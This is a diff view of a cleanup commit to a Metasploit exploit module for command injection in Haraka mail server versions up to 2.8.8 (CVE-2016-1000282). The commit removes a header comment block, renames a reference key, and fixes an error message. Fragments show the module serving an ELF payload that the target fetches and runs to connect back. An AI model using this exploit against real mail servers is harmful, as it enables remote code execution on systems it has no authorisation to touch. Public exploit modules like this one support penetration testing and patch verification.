|
1 | | -## |
2 | | -# This module requires Metasploit: http://metasploit.com/download |
3 | | -# Current source: https://github.com/rapid7/metasploit-framework |
4 | | -## |
5 | | -# |
6 | | -# Exploit Title: Harakiri |
7 | | -# ShortDescription: Haraka comes with a plugin for processing attachments. Versions before 2.8.9 can be vulnerable to command injection |
8 | | -# Exploit Author: xychix [xychix at hotmail.com] / [mark at outflank.nl] |
9 | | -# Date: 26 January 2017 |
10 | | -# Category: Remote Code Execution |
11 | | -# Vendor Homepage: https://haraka.github.io/ |
12 | | -# Vendor Patch: https://github.com/haraka/Haraka/pull/1606 |
13 | | -# Software Link: https://github.com/haraka/Haraka |
14 | | -# Exploit github: http://github.com/outflankbv/Exploits/ |
15 | | -# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8 |
16 | | -# Version: <= Haraka 2.8.8 (with attachment plugin enabled) |
17 | | -# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS |
18 | | -# Tested versions: 2.8.8 and 2.7.2 |
19 | | -# CVE : CVE-2016-1000282 |
20 | | -# Credits to: smfreegard for finding and reporting the vulnerability |
21 | | -# Thanks to: Dexlab.nl for asking me to look at Haraka. |
22 | | -# |
23 | | -# Disclaimer: |
24 | | -# This software has been created purely for the purposes of academic research and |
25 | | -# for the development of effective defensive techniques, and is not intended to be |
26 | | -# used to attack systems except where explicitly authorized. Project maintainers |
27 | | -# are not responsible or liable for misuse of the software. Use responsibly. |
28 | | -# |
29 | | -# This is to be considered a responsible disclosure due to the availability of an effective patch. |
30 | | -# |
31 | 1 | #this code is based on: |
32 | 2 | # https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb |
33 | 3 |
|
@@ -61,7 +31,7 @@ def initialize(info = {}) |
61 | 31 | [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py'], |
62 | 32 | [ 'URL', 'https://www.exploit-db.com/exploits/41162/'], |
63 | 33 | [ 'URL', 'https://github.com/distributedweaknessfiling/DWF-Database-Artifacts/blob/158c10cf11bc7d6ad728c1a8dd213f523ecfca52/DWF/2016/1000282/CVE-2016-1000282.json'], |
64 | | - [ 'EDB-ID', '41162'] |
| 34 | + [ 'EDB', '41162'] |
65 | 35 | ], |
66 | 36 | 'Privileged' => false, |
67 | 37 | 'Arch' => ARCH_X86, |
@@ -104,7 +74,7 @@ def wait_linux_payload |
104 | 74 | select(nil, nil, nil, 1) |
105 | 75 | waited += 1 |
106 | 76 | if (waited > datastore['HTTP_DELAY']) |
107 | | - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") |
| 77 | + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it can't connect back to us?") |
108 | 78 | end |
109 | 79 | end |
110 | 80 | end |
|
0 commit comments